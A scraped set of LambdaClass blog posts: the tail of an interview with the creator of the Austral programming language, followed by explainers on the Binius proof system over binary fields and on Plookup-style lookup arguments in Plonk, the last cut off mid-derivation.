So type inference in ML family languages is a failed idea because you end up annotating the types anyways: you have to annotate the types of functions for documentation, and you frequently end up annotating the types of local variables for both readability and to constrain the type inference engine and make the errors easier. It’s just this really frustrating, circuitous way of doing what in Java you’d be forced to do in the first place. And I see people using VS Code with an LSP set up to display the types of the variables over the code and think, well, why not just have them written? Then you can read the code outside your dev environment, like in a GitHub diff for example.</p>
I’ve found that type inference is only useful in a very narrow set of circumstances where type information doesn’t flow strictly downwards and annotations would be cumbersome. The best example of this is the Option</code> type. If you have this in Rust:</p>
enum Option {

Some(T),

None,

}</p>
Then in the Some</code> constructor, there’s no need for inference, because type information flows downwards: Some: T -> Option<T></code>. But without type inference the None</code> constructor is harder: it doesn’t take a value, so in a language without type inference, you have to tell the compiler which type should be used in place of T</code>. But a general type inference engine is such a complex piece of machinery for such a narrow use case.</p>
And then there’s the performance cost. The more advanced the type system, the more expensive inference becomes . There’s also the fact that type inference wastes a lot of academic effort. Academic papers on PLT will introduce a new type system, and then spend pages and pages describing the type reconstruction algorithm. And I’m like, this is the least interesting part of it! Let me annotate things manually and show me what this thing can do to solve real problems!</p>
So in Austral type information flows in one direction only, and variables and everything require annotations everywhere. The cost is you spend unobservable extra milliseconds writing. The gain is the code is instantly more readable and you never again have to deal with weird inference bugs.</p>
Macros are also mentioned as an anti-feature but in your writings you mention Lisp. Do you consider there are valid use cases in general or in Austral for metaprogramming, and for which kinds of metaprogramming?</strong></p>
I used to write Common Lisp a lot. And macros work decently well in CL*. One of the things that attracted me to Lisp is that every programmer is a language designer. I used to think that was a very good thing: you can implement language features in a few seconds that Java programmers have been begging for in mailing lists for years. But then I saw what people do with macros and changed my mind.</p>
This is part of a general pattern that when I was younger I wanted expressive power, and I was attracted to Common Lisp because in Common Lisp you can wave your magic wand and change the world. But after 10y of cleaning up people’s horrible code I realize what I want are fewer nightmares. Macros make everyone a language designer, and that, I realize, is a very bad thing because most people should not be anywhere near language design. Macros might work in a language that is only used by like, insane PL geniuses who also have great communication skills and write lots of docs, but “this feature can only be used by discerning geniuses with great taste” is not sustainable in the real world.</p>
What do people use macro systems (and related things like Java-style annotations) for? Largely to build nightmares: codebases shot through with magic, where every type has like seven different annotations involving serialization, RPC, SQL mappings and the like. The code you see on the page is not what’s running: it’s an input to a vast, ill-defined, ad-hoc programming language made up of third-party macros that transforms the code in unpredictable ways. Errors become impossible to trace because nobody can tell you concretely what control flow looks like. Changes to the codebase become unpredictable.</p>
So macros are kind of a bait and switch. The bait is, “it would be nice to have to have a shorthand way to write this common code”. The switch is you end up with a codebase nobody can understand.</p>
And the solution is build-time code generation. It’s a lot like macros, but you can inspect the generated code, commit it to version control, debug it, and it is cleanly separate from the rest of the code you write.</p>
    * I wrote about why here: <https://borretti.me/article/why-lisp-syntax-works></span></span></code></pre>
The capability-based security description sounds strikingly similar to OpenBSD’s  pledge</code>. Did you take inspiration from them?</strong></p>
This is one area where I wish I’d kept something like a lab notebook while iterating on the language design. It would be invaluable to be able to go back and see what I was aware of and when, which papers I read and such. I think I was aware of pledge and how it works at the time. I really like the pledge API. Linux and FreeBSD capabilities are hellishly complicated when compared to the bare-bones simplicity of pledge. Austral’s capability security is similar to pledge in that in both systems, you start with infinite capabilities, and you can then surrender those capabilities, irreversibly, one at a time. But Austral’s system is more granular because it doesn’t rely on a hardcoded list of syscalls, but, rather, you get pledge() at the value level, you can pledge individual files and other objects.</p>
What is the most difficult part of designing a programming a new programming language like Austral?</strong></p>
I should say building a community, getting people interested, but honestly the most frustrating thing has been writing the compiler.</p>
There’s this tension between, on the one hand, you want the simplest, most MVP, most prototype bootstrapping compiler so you can get to the stage where you can write real running programs and actually start playing with the language. That tells you a lot about ergonomics, about possible soundness issues. Because when things are vague and ill-defined they’re always great, it’s only when you concretize things (by implementing them) that you start to notice the flaws and the tradeoffs.</p>
But if the compiler is too MVP you will have bugs you can’t easily figure out, because the error reporting is very poor for example. Compilers are really uniquely hellish to test and debug.</p>
So you’re always changing course between “build a simple MVP compiler so I can quickly iterate on it” and “build something with production-grade diagnostics and error reporting”.</p>
Are you planning on building a community or userbase? How do you think you can generate momentum to attract Rust or C programmers to develop with Austral?</strong></p>
I have a little Discord. I want to do more work to have something more substantial especially around the standard library and build tooling before spending much more effort on marketing. I think a lot of programmers are very tired of language churn and framework churn and library churn, and the idea of a small, simple, conservative, slow-moving language is appealing. Here’s a thing you can learn in an afternoon, and the code you write will compile and run thirty years from now, and you won’t have to jump ship in horror in a decade.</p>
Do you think you can reuse existing tooling from other languages (like gdb, or rust-analyzer)? What is the state of the standard library and how do you see it evolving?</strong></p>
The current compiler spits out C. I don’t want that to become a trait of the language (“Austral compiles to C”), since it’s just an implementation detail of the compiler. So gdb and valgrind should be usable.</p>
rust-analyzer, I doubt it. It’s a huge thing and is essentially the most complex parts of a compiler frontend specifically for Rust.</p>
I think it would be a good idea to write the production compiler with a view towards making it usable also as an LSP.</p>
The standard library is very minimal: simple containers and typeclasses. I see myself making small additions to it. A lot of people hate dependencies but I’m a big believer in lots of small libraries actually, so I like the idea of the standard library being just code that is either “eternal” (e.g. a resizable array type) or pervasive (e.g. date and time) or binding some platform-specific thing (e.g. file I/O).</p>
Is interoperability with other languages (e.g. FFI) part of the roadmap? How would it interact with linear types and capabilities?</strong></p>
Interoperability with C is already there. That’s the most useful one because the C calling convention is basically the lingua franca of every language.</p>
Some languages advertise e.g. automatic interoperability with C++. That is vastly more effort and I think it’s entirely misguided. e.g. the Clasp compiler for Common Lisp was built essentially so the author could access C++ libraries that use templates and such from Common Lisp. It’s a tremendous amount of effort when you can simply write a light extern C wrapper around the C++ code you need (in Common Lisp you can even automate much of this). So I’m not too worried about C++ interop. In the future we’ll just have an LLM port the entire C++ codebase over no problem.</p>
What are your future plans for Austral? Do you plan to grow the language and add new features like concurrency primitives?</strong></p>
Standard library, build system and package manager, better docs. That’s the first thing.</p>
I’m procrastinating on concurrency models because I don’t know enough about them, and I don’t want to prematurely specialize the language to an approach that might not pan out. Go has green threads and goroutines and that hasn’t worked out for them, the design gives up a lot of performance. OCaml has green threads now and that seems to be working out for them so far. I think Rust-style async is very unfairly maligned, but it also has practical problems in that, because of the way it interacts with lifetimes, everyone ends up putting all of their shared resources under reference-counted pointers. And so in theory the perf ceiling is very high but in practice people will leave a lot of performance on the table to get code that can be feasibly written and refactored.</p>
So I’m happy to sit back and let the world define itself for me, and when there’s a clear and compelling right thing to do, I’ll implement it in Austral in the simplest, most orthogonal way possible.</p>
Conclusion</h2>
If you enjoy interviews to programming language creators, you might also enjoy these previous ones:</p>
    * Dec 8, 2014 [https://blog.lambdaclass.com/indie-languages-interview-pixie-and-timothy-baldridge/](/indie-languages-interview-pixie-and-timothy-baldridge/)</span></span>
    * Aug 26, 2015 [https://blog.lambdaclass.com/interview-with-brian-mckenna-about-roy-purescript-haskell-idris-and-dependent-types/](/interview-with-brian-mckenna-about-roy-purescript-haskell-idris-and-dependent-types/)</span></span>
    * Aug 28, 2015 [https://blog.lambdaclass.com/interview-with-nenad-rakocevic-about-red-a-rebol-inspired-programming-language/](/interview-with-nenad-rakocevic-about-red-a-rebol-inspired-programming-language/)</span></span>
    * Nov 27, 2015 [https://blog.lambdaclass.com/efene-an-erlang-vm-language-that-embraces-the-python-zen/](/efene-an-erlang-vm-language-that-embraces-the-python-zen/)</span></span>
    * Dec 28, 2015 [https://blog.lambdaclass.com/interview-with-jesper-louis-andersen-about-erlang-haskell-ocaml-go-idris-the-jvm-software-and/](/interview-with-jesper-louis-andersen-about-erlang-haskell-ocaml-go-idris-the-jvm-software-and/) Dec 29, 2015 [https://blog.lambdaclass.com/interview-with-jesper-louis-andersen-about-erlang-haskell-ocaml-go-idris-the-jvm-software-and-60901251608c356716f2f92e/](/interview-with-jesper-louis-andersen-about-erlang-haskell-ocaml-go-idris-the-jvm-software-and-60901251608c356716f2f92e/)</span></span>
    * Feb 29, 2016 [https://blog.lambdaclass.com/interview-with-robert-virding-creator-lisp-flavored-erlang-an-alien-technology-masterpiece/](/interview-with-robert-virding-creator-lisp-flavored-erlang-an-alien-technology-masterpiece/)</span></span>
    * Feb 12, 2018 [https://blog.lambdaclass.com/interview-with-brad-chamberlain-about-chapel-a-productive-parallel-programming-language/](/interview-with-brad-chamberlain-about-chapel-a-productive-parallel-programming-language/)</span></span>
    * Apr 1, 2019 [https://blog.lambdaclass.com/an-interview-with-the-creator-of-gleam-an-ml-like-language-for-the-erlang-vm-with-a-compiler/](/an-interview-with-the-creator-of-gleam-an-ml-like-language-for-the-erlang-vm-with-a-compiler/)</span></span></code></pre>


How Binius is helping move the ZK industry forward
Unknown — Tue, 12 Dec 2023 00:00:00 +0000
Introduction</h2>
Zero-knowledge and validity proofs, often abbreviated as ZK, represent a fascinating field within the realms of cryptography, mathematics, and computer science. They allow one party, the prover, to convince other parties, termed verifiers, that a specific statement (such as the execution of a computer program) is true in a time- and space-efficient way. This means that the proof can be verified much faster than if the verifiers were to perform the computation directly and need less information, with the possibility that the proof does not leak sensitive data.</p>
The consequences of practical zero-knowledge proofs for engineering are many and far-reaching, as we discussed in our previous blog post</a>. One of those areas is crypto (see our crypto doctrine</a>). Still, it extends to content creation platforms, identity and authentication, national security, distributed computing, etc.</p>
Current developments in ZK</h2>
To prove the execution of arbitrary computer programs, we need to transform them into a form amenable to ZK; this process is called arithmetization and consists of expressing the program as a bunch of equations defined over integers/finite fields. There are differences in how we express and think in computer programs, using bytes and binary operations. For example, if our program has a boolean variable, we must ensure that the variable takes only the values 0 or 1. Since we work with integers, this condition adds an equation of the form $b(1 - b) = 0$. The problem is that this variable is represented with a large integer (at least 64 bits long), which adds significant overhead in memory use and computational time since we now work with operations over finite fields (not bits). Operations such as bitwise operations or showing the binary decomposition of an integer are costly.</p>
Since performance in ZK involves different tradeoffs than ordinary programming, developers need to have a deeper understanding of cryptography and learn to code differently. The tooling for developers is still being created and depends, in some cases, on writing arithmetic circuits directly, which is time-consuming and prone to bugs. Besides, proving adds significant overhead, both in memory and time use. Therefore, ZK introduces difficulties both in developer and user experiences. It means more time and money spent on training developers and lower availability of skilled programmers.</p>
During the last years, the zk space has advanced really fast, and we have seen efforts going in various directions to increase the performance of the proof systems:</p>
    1. STARKs using small field sizes, such as mini-Goldilocks and the 31-bit Mersenne prime.</span></span>
    2. Folding schemes, such as Nova, Protostar, and Protogalaxy.</span></span>
    3. Lookup arguments, with Jolt aiming to reduce everything to just looking up any operation over a pre-computed table of valid input/output pairs.</span></span></code></pre>
Each system has advantages and disadvantages regarding proof size, prover time, verifier time, and the type of computations that can be easily supported. There have been efforts on the hardware side to accelerate these proof systems, but they all pay the price for representing bits in terms of field elements.</p>
Binius and the use of binary fields</h2>
Using smaller fields in STARKs reduced the overhead in representing variables and led to lower proving times. The question arises naturally: can we do better than this? Near the end of the year, Ulvetanna released a paper</a> showing that we can work over smaller fields and open-sourced an implementation, Binius. A first analysis of Binius can be found here</a>. We will release the second part of the post soon, diving deeper into the construction and its uses.</p>
Binius’s contributions can be summarized in three main points:</p>
    1. Working with binary fields -this is essentially working with bitstrings of various sizes. It is possible to adjust the size to represent variables with no overhead.</span></span>
    2. A commitment scheme for small fields. It is based on hash functions, which are faster than those based on elliptic curves and do not need a trusted setup. It draws heavily on [Brakedown](https://eprint.iacr.org/2021/1043.pdf).</span></span>
    3. A SNARK built on top of 1 and 2, based on the ideas of HyperPlonk, but which could be extended to other arithmetization schemes.</span></span></code></pre>
The main advantage of the whole construction is that it handles bit operations more naturally (for example, the exclusive OR between two bitstrings is just the addition over the field) and eliminates the overhead associated with the representation of data types. For instance, boolean variables can be represented by just one field element of size 1 bit! This reduced the memory footprint of the whole proof system (though we will need to work with larger fields to achieve cryptographic security).</p>
Another advantage is that operations are really fast and hardware-friendly. In the case of adding field elements, it is just the XOR operation, avoiding carry and overflow. There are also very efficient algorithms to work with binary fields, such as an additive Fast Fourier Transform (FFT), which is used to produce the Reed-Solomon encoding.</p>
The main drawbacks are related to proof size (it is significantly larger than most SNARKs and STARKs, in the order of a few MB) and verifier time. However, the verifier’s time is on par with most proof systems, and the prover is significantly faster. Besides, smaller proof sizes in SNARKs come at the cost of a trusted setup, which makes the whole system rely on the integrity of a parameter initialization ceremony, generally using several GB of memory.</p>
Applications</h2>
The original paper shows how to arithmetize the Keccak and Grøstl hash functions, which involve many bitwise operations, making them hard to work using other proof systems. The performance analysis offers an idea of the capabilities of the new construction and what we can gain by adopting it. The ability to handle bitwise operations more naturally also allows us to use these hash functions for commitments and prove them easily.</p>
We could build a virtual machine and prove the correctness of its execution using Binius. This could make proving general computer programs very efficient, at least in terms of the time needed to generate the proof. We could solve the problem of proof size by wrapping the proofs with a SNARK/STARK, which will only need to verify Binius’s proofs, leading to more lightweight and efficient constructions.</p>
Reducing the prover’s memory and time use can enable provable fully homomorphic encryption (FHE), which lets users delegate expensive computations to untrusted servers without compromising the data. FHE allows users to compute over encrypted data without decrypting it first.</p>
Conclusions</h2>
We think that Binius can be a game changer when it comes to scaling provable computations, which can spark significant changes in different areas of software engineering and finance. The reduction in memory use and hardware friendliness of the operations and the development of a virtual machine could make provable computations in consumer-end hardware a reality while enhancing the developer experience, and reducing the resources and training needed. We are one step closer to the mass adoption of zk technology. Lambdaclass is interested in this new proof system and its capabilities and we would like to start implementing and developing it in 2024.</p>


SNARKs on binary fields: Binius - Part 1
Unknown — Fri, 01 Dec 2023 00:00:00 +0000
Introduction</h2>
ZK-SNARKs (zero-knowledge, succinct, non-interactive arguments of knowledge) and STARKs (scalable, transparent arguments of knowledge) have gained widespread attention due to their applications in distributed private computing and blockchain scaling. Over the years, we have seen several performance improvements thanks to new proof systems, new lookup arguments, and smaller fields. One of the biggest challenges is related to the arithmetization of programs, that is, the transformation of a given program into a system of polynomial relations. This represents a considerable overhead, as we have to represent variables, such as bits, by elements in a finite field. In the case of SNARKs over elliptic curves, the field is given by the elliptic curve used, which means that to represent simple bit operations, we have to use (at least) 256-bit field elements. In the case of STARKs, we can use smaller fields (such as mini Goldilocks or Mersenne 31), which gives a smaller overhead, but then we have to work over extension fields to achieve cryptographic security. Typical hash functions involve lots of bitwise operations, which makes their arithmetization costly (and therefore proving things that involve computing hashes). This has led to the use of SNARK-friendly hashes such as Poseidon or Tip5.</p>
A recent line of work by Ulvetanna</a> proposes using binary fields with the brakedown polynomial commitment scheme to obtain a new SNARK, which can represent bitwise operations more naturally. It also has the advantage that it is hardware-friendly and has a lower memory footprint. This post will explain some key concepts, such as binary fields and the brakedown commitment scheme. We will use these concepts later to understand the working principle of Binius</a>.</p>
Binary fields</h2>
Binary fields are fields of characteristic two. They are of the form $\mathbb{F_{ 2^n }}$ for some $n$. The simplest binary field is $\mathbb{F_2}$ whose elements are just $\{ 0, 1 \}$ with the operations done modulo $2$. Addition corresponds to bitwise exclusive OR, and multiplication corresponds to bitwise AND. Given that $2^n$ is not prime, we need to do some work to turn it into a field. First, we are going to consider the polynomials over $\mathbb{F_2}$, that is, polynomials whose coefficients are either $0$ or $1$, such as $p(x) = x^7 + x^5 + x^2 + 1$. Then, we select an irreducible polynomial $m(x)$ over $\mathbb{F_2}$ and consider the equivalence classes by taking the remainder of any polynomial by $m(x)$. For example, the polynomial $m(x) = x^2 + x + 1$ is irreducible; the remainder is always a polynomial of at most degree one $r(x) = a x + b$, where $a$ and $b$ is either zero or one. The resulting field is $\mathbb{F_{ 2^2 }}$, which contains $4$ elements, $0 + 0x$, $1 + 0x$, $0 + x$, $1 + 1x$, which we can represent as $00$, $10$, $01$ and $11$. We can always represent unambiguously an element in $\mathbb{F_{ 2^n }}$ by a bitstring of length $n$. A list of irreducible polynomials over $\mathbb{F_2}$ can be found here</a>.</p>
The polynomial $m(x) = x^3 + x + 1$ is also irreducible, so we can use it to build a different extension, $\mathbb{F_{ 2^3 }}$, containing $8$ other elements. A different approach to constructing $\mathbb{F_{ 2^3 }}$ is using extension towers. Binius uses the construction proposed by Wiedemann</a>.</p>
We can use the multilinear Lagrange polynomials as a base for the tower of extensions. This has the advantage that embedding one extension into the others is achieved trivially by padding zero coefficients. The construction proceeds inductively:</p>
    1. Start from $\tau_0 = \mathbb{F_2}$.</span></span>
    2. Set $\tau_1 = \mathbb{F_2} [ x_0 ] / (x_0^2 + x_0 + 1)$</span></span>
    3. Continue $\tau_k = \mathbb{F_2} [ x_{ k - 1} ] / ( x_{ k - 1 }^2 + x_{ k - 1} x_{ k - 2} +1)$</span></span></code></pre>
We have $\tau_0 \subset \tau_1 \subset \tau_2 \subset \dots \subset \tau_m$.</p>
Let’s take a look at the elements to see how this works:</p>
    1. For $\tau_0$ this is straightforward, since we have either $0$ or $1$.</span></span>
    2. For $\tau_1$, the elements are $0 + 0x_0$, $1 + 0x_0$, $0 + 1x_0$, $1 + 1x_0$. We can identify the elements of $\tau_0$ with the first two, $00$ and $10$.</span></span>
    3. For $\tau_2$, we have $0 + 0 x_0 + 0 x_1 + 0 x_0 x_1$, $1 + 0 x_0 + 0 x_1 + 0 x_0 x_1$, $0 + 1 x_0 + 0 x_1 + 0 x_0 x_1$, $1 + 1 x_0 + 0 x_1 + 0 x_0 x_1$, $1 + 0 x_0 + 1 x_1 + 0 x_0 x_1$, $0 + 1 x_0 + 1 x_1 + 0 x_0 x_1$, $1 + 1 x_0 + 1 x_1 + 0 x_0 x_1$, etc, which we identify with all bitstring of size 4. The elements of $\tau_1$ can be seen as the elements in $\tau_2$ of the form $b_0 b_1 00$. This way of sorting the elements corresponds to lexicographic ordering.</span></span></code></pre>
It’s also worth noting that given an element $b_0 b_1 b_2 … b_{ 2^k - 1}$ from $\tau_k$, we can break it into halves, which satisfy $b_{lo} + X_{k - 1} b_{hi}$, where $b_{hi}$ and $b_{lo}$ are from $\tau_{ k - 1}$. The addition is just XOR, which has several advantages from the hardware point of view, including the fact that we don’t need to worry about carry. Multiplication can be carried out in a recursive fashion using the decomposition we saw. If we have $a_{hi} x_k + a_{lo}$ and $b_{hi} x_k + b_{lo}$ we get

$a_{hi} b_{hi} x_k^2 + (a_{hi} b_{lo} + a_{lo} b_{hi}) x_k + a_{lo} b_{lo}$

But we know that $x_k^2 = x_{k-1} x_k + 1$. We then have to compute products in $\tau_{ k - 1}$, where we can apply the same strategy until we can solve them either because it’s a trivial operation (operation over $\mathbb{F_2}$) or because we have a lookup table to get the values. There are also efficient multiplication techniques to multiply elements from a field by an element in a subfield. For example, an element from $\tau_{ k + j}$ can be multiplied by an element of $\tau_k$ in just $2^j$ multiplications.</p>
Coding Theory</h2>
A code of block $n$ over an alphabet $A$ is a subset of $A^n$, that is, vectors with $n$ elements belonging to $A$. The Hamming distance between two codes is the number of components in which they differ.</p>
A $[k, n , d]$ code over a field $\mathbb{F}$ is a $k$-dimensional linear subspace of $\mathbb{F}^n$ such that the distance between two different elements is at least $d$. Reed-Solomon codes are examples of these types of codes. Given a vector of size $k$, $(a_0, a_1, … , a_{ k - 1})$, its Reed-Solomon encoding consists in interpreting each $a_k$ as the evaluation of a $k - 1$ degree polynomial and then evaluating this polynomial over $n$ points (we used this encoding when working with STARKs). The code is called systematic if the first $k$ elements correspond to the original vector. The ratio $\rho = k / n$ is the rate of the code (we worked with its inverse, the blow-up factor). In this case, the distance is $n - k + 1$ since degree $k - 1$ polynomials can coincide at most in $k - 1$ points.</p>
The $m$-fold interleaved code of block length can be seen as the linear code of size $n$ defined over the alphabet $A^m$. We can view the code as rows with elements in $A^m$.</p>
Given a $[n,k,d]$ linear code $C$ over $\mathbb{F}$ with generating matrix $M$ and a vector space $V$ over $\mathbb{F}$, the extension code $C^\prime$ of $C$ is the image of the mapping $M x$, where $x$ is in $V^k$.</p>
Polynomial Commitment Scheme</h2>
The polynomial’s coefficients and code field size $\mathbb{F}$ can be as small as needed, but they should be the same. The security can be added by sampling elements from an extension field $\mathbb{E}$.</p>
The prover starts with a vector $(t_0, t_1, … t_n)$, which he interprets as the coefficients in the Lagrange basis over ${0 , 1}^{\log n}$. Then, he organizes the coefficients in an $m_0 \times m_1$ matrix $T$, with rows $\mathrm{row_i}$ and encodes $\mathrm{row_i}$ to obtain $u_i$ (there are $m_0$ rows of length $\rho^{ - 1 } m_1$). We call the matrix containing the $u_i$ as rows, $U$. Build a Merkle tree using each column as a leaf and output the root as the commitment.</p>
The verifier selects an evaluation point $r = (r_0, r_1 , \dots, r_{ \log (n) - 1})$, and the prover will provide $s$ as the evaluation of the polynomial over $r$. To generate the evaluation proof,</p>
    1. The prover sends the vector - matrix product $R.T$, where $R$ is the tensor product of the last $\log (m_0 )$ components of $r$.</span></span>
    2. The verifier samples $i$ queries (which depend on the security level), selecting one column of $U$ each time.</span></span>
    3. The prover sends the requested columns and their corresponding authentication paths.</span></span></code></pre>
The proof consists of the evaluation, $s$, the Merkle root, $\mathrm{root}$, the vector-matrix product $R.T$, the $i$ columns, and their corresponding authentication paths.</p>
To check the proof:</p>
    1. The verifier checks that the Merkle tree contains the columns.</span></span>
    2. The verifier computes the encoding of $R.T$ and checks that the product of the selected columns of $U$ by $R$ correspond to the columns of encoding of $R.T$.</span></span>
    3. The verifier checks that $s$ is the proper evaluation using $R.T$ and the tensor product of first $\log (m_1)$ components of $r$.</span></span></code></pre>
A key concept to building the commitment scheme is that of packing. Given m elements $\tau_{ k }$, we can group then into $m/2^j$ elements of $\tau_{ k + j}$. Similarly, the rows can be packed into elements of $\tau_r$. The polynomial commitment is modified to have the verifier test blocks of columns instead of single columns.</p>
Conclusion</h2>
In this post, we covered the basic concepts behind Binius. The construction takes advantage of binary fields built using extension towers, which leads to hardware-friendly operations. The construction also lets us concatenate several elements and interpret them as elements of an extension field. The commitment scheme is based on brakedown, which uses Merkle trees and Reed-Solomon encoding. The scheme results in larger proofs and longer verification times than FRI, but the prover’s time is significantly reduced. However, the benefits in terms of prover time generally outweigh those of longer verification times. Besides, using recursive proofs can further reduce the proof size, or we could use one final SNARK, such as Groth16 or Plonk, to achieve smaller proofs to post to L1. In the following posts, we will look deeper at the commitment scheme and the different protocols for the SNARK.</p>


If you don't know, look it up or how to create lookup tables for zero knowledge proofs
Unknown — Thu, 02 Nov 2023 00:00:00 +0000
Introduction</h2>
ZK-SNARKs (zero-knowledge succinct, non-interactive arguments of knowledge) and STARKs (scalable transparent arguments of knowledge) are powerful cryptographic constructions with applications in decentralized private computing and blockchain scaling. They allow one party, the prover, to show that he carried a computation correctly to a second party, the verifier, in a way that is both memory and time-efficient. In other words, the prover can submit a short proof (more concise than sending all the values involved in the calculation), which can be verified in less time than we would need for the independent re-execution of the computation. These constructions rely on encoding the information as polynomials, committing to them (via a polynomial commitment scheme, such as FRI or KZG), and showing that certain relationships hold between polynomials. For an introduction to these concepts, see our previous posts on STARKs</a>, Plonk</a>, Groth 16</a> or the introductory videos by Dan Boneh</a> at zkhack.</p>
The first step is transforming code into a system of polynomial equations over a finite field. This is known as arithmetization, and typical arithmetization schemes are R1CS (rank one constraint system), Plonkish, and AIR (algebraic intermediate representation). Some operations are expensive to arithmetize, which can lead to signficant costs for the prover. Lookup arguments are a powerful technique that helps us solve this problem by having a precomputed table of values (it can also be dynamic). In this blog post, we will cover the basics of lookup arguments and describe the PlookUp scheme. The topic has been discussed in the ongoing Sparkling Water Bootcamp</a>, where we will provide an implementation of the different lookups in our library, Lambdaworks</a>.</p>
Examples and working principle</h2>
Suppose we want to check that a variable $a$ has to be in a prescribed range, such as a u8</code>. One simple yet ineffective way to do so is to express $a$ in its binary form $a_0 a_1 a_2 a_3 a_4 a_5 a_6 a_7$ and check that:</p>
    1. Every variable is boolean $a_i (1 - a_i ) = 0$</span></span>
    2. $a = \sum a_k 2^k$</span></span></code></pre>
This approach makes us add several additional constraints, which scale proportionally with the number of bits. Another approach could be showing that the number is contained in the list of all valid values for the variable. This is an example of a lookup operation. The first lookup arguments depended on the table size (we paid the price both for the lookup operations we did and for the whole table). At the same time, newer constructions make us pay the price only for the number of lookup operations (plus some preprocessing). If we have to do just a few lookup operations, then using these arguments does not pay off (we could accept having more constraints). Still, as the number or complexity of the operations increases, it makes sense to support lookups.</p>
We can prove bitwise operations using lookup tables. For example, for the exclusive or between two bytes $a$ and $b$, $c = a \oplus b$, we can use the arithmetic constraints to represent the operations,

$a_i (1 - a_i ) = 0$

$b_i (1 - b_i ) = 0$

$a_i + b_i - 2a_i b_i - c_i = 0$

We could also have a list with all possible combinations, $a$, $b$, and $c$. Given that each byte takes 256 different values ($2^8$), we could have a table listing all valid input/output trios ($2^{ 16 } = 65536$) and check that our $(a , b, c)$ are in that list.</p>
To prove inclusion, we will use tricks similar to those we applied for the permutation arguments</a>. We will first reduce the claim of our tuple $(a , b , c)$ being in table $\mathcal{T}$ to a relationship between two vectors. We will show that, for every component in the vector $f$, there exists some component in the vector $t$ such that $f_i = t_k$. We can zip the table into a single vector by performing a random folding of the columns,

$t = col_0 (\mathcal{T}) + \zeta col_1 (\mathcal{T}) + \zeta^2 col_2 (\mathcal{T})$

We can reduce our tuple $(a, b , c)$ to the vector $f$ by doing the same operation,

$f = a +\zeta b + \zeta^2 c$</p>
To be able to apply a kind of permutation argument, we should know the number of times every element in $f$ appears in $t$, which can be something problematic. Instead, we can work with randomized differences over sorted vectors. This method was introduced in the PlookUp paper</a>. We build a vector $s$, which results from concatenating the vectors $f$ and $t$ and sorting them by the order they appear in $t$. If the set of non-zero consecutive differences in $s$ is the same as $t$, then this proves that $f$ has all its values in the set given by $t$. If the values of $t$ appear more than once in $f$, the consecutive differences will yield $0$ for equal elements, thus eliminating them from the checks. The randomized differences avoid having to check the initial values,

$\Delta s_i = s_i + \beta’ s_{i + 1}$

$\Delta t_i = t_i + \beta’ t_{i + 1}$

In the case of randomized differences, even if the consecutive elements are the same, the difference will be non-zero. However, we know that the differences will be multiples of $1 + \beta’$, which allows us to identify them. The check involves two bivariate polynomials, $F$ and $G$,

$F = (1 + \beta’)^n \prod (\gamma’ + f_j) \prod (\gamma’ (1 + \beta’ ) + \Delta t_i )$

$G = \prod (\gamma’ (1 + \beta’ ) + \Delta s_i )$

If these two polynomials are the same, we have proven that all the values of $f$ are contained in the set given by $t$.

As in the permutation check, it is useful to define the vector $z$, defined by:

$$z_0 = 1$$

$$z_i = \prod \frac{(1 + \beta’)(\gamma’ + f_i )(\gamma’(1 + \beta’) + \Delta t_i )}{(\gamma’ (1 + \beta’ ) + s_{2i - 1} + \beta’ s_{2i } )(\gamma’ (1 + \beta’ ) + s_{2i} + \beta’ s_{2i + 1} )}$$

We can then interpolate the values of $z$ to obtain the polynomial $z (x)$ which must satisfy the conditions:</p>
    1. $z (x = 1) = 1$</span></span>
    2. $z (x = g^N ) = 1$</span></span>
    3. $z(x) U(x) - z(gx) V(x) = 0$</span></span></code></pre>
where the polynomials $U(x)$ and $V(x)$ result from the interpolation of the polynomials $F$ and $G$, respectively. These constraints must be added to the constraints of the proof system we are using.</p>
Plonk and Lookup tables</h2>
For a recap of the Plonk protocol, we recommend reading our previous post</a> or the Lambdaworks docs</a>. Plonk’s arithmetization used selector variables $q_l , q_r , q_m , q_o , q_c$ to describe the different types of gates, which for a valid execution $(a , b , c)$ should satisfy the following equations:

$q_l (x) a(x) + q_r (x) b(x) + q_m a(x) b(x) + q_o (x) c(x) + q_c (x) + pi(x) = 0$

When introducing lookups into Plonk, we add a new selector variable, $q_{lu}$. This variable will equal $1$ when the values of $(a, b, c)$ must be checked to belong to a given table. The other selectors will be zero in that case, which will trivially satisfy the equations for the other types of gates. We recommend following the PlonkUp paper</a> for further details.</p>
Setup and preprocessed input</h3>
In Plonk we start with the common preprocessed input, which consists of the selector polynomials, $q_l(x) , q_r (x), q_m (x), q_o (x) , q_C (x)$, plus the copy constraint polynomials $S_{\sigma 1} (x) , S_{\sigma 2} (x) , S_{\sigma 3} (x)$. In the case of lookups, we have more preprocessed information, such as $q_{lu} (x)$, $col_0 (\mathcal{T}) (x) , col_1 (\mathcal{T}) (x) , col_2 (\mathcal{T}) (x)$.</p>
Round 1 - Committing to an execution of the circuit</h3>
Round 1 in the Plonk protocol consists of interpolating the column polynomials $a(x)$, $b(x)$, and $c(x)$ and committing to them. This way, the prover commits to a given execution of the circuit, and he won’t be able to change the values of the execution trace.</p>
Round 2 - Enter Lookups</h3>
When we have lookups, we add a new round. We will call it Round 2. Here, the prover will zip the table into a vector and start all the work to prove the lookup arguments. The prover samples the folding coefficient $\zeta$ for the table and wirings and obtains the compressed table and queries,

$t = col_0 (\mathcal{T}) + \zeta col_1 (\mathcal{T}) + \zeta^2 col_2 (\mathcal{T})$

$f^\prime = a +\zeta b + \zeta^2 c$

This last polynomial needs blindings to make them zero-knowledge, following the same recipe from Round 1:

$f(x) = f^\prime (x) + Z_H (x) (b_7 + b_8x)$

After that, the prover builds the vector $s$, sorted by $t$. Since this vector’s length is greater than the size of the domain $H$ over which we interpolated $t$ and $f$, we break it down into two parts, $h_1$ and $h_2$, and we create the polynomials $h_1 (x)$ and $h_2 (x)$. Two common approaches exist for breaking the polynomial: take the first half and interpolate and then the second half or split into odd and even terms. The second approach needs one check less, so we will adopt that strategy here, following PlonkUp</a>. Since the polynomials $h_1 (x)$ and $h_2 (x)$ contain information about the witness, we also add blindings to these polynomials.</p>
The round ends with the commitment of the queries’s polynomial, $f(x)$, and the parts of the sorted vector $h_1 (x)$, and $h_2 (x)$.</p>
Round 3 - Computing the permutation and Plookup polynomials</h3>
Round 3 involves the calculation of the copy constraint polynomial, $z_1 (x)$, and the Plookup polynomial, $z_2 (x)$. The permutation argument polynomial, $z_1 (x)$ is given by the following three terms:

$$z_{11} = (b_{14} x^2 + b_{15} x + b_{16} ) Z_H (x)$$

$$z_{12} = L_{1} (x)$$

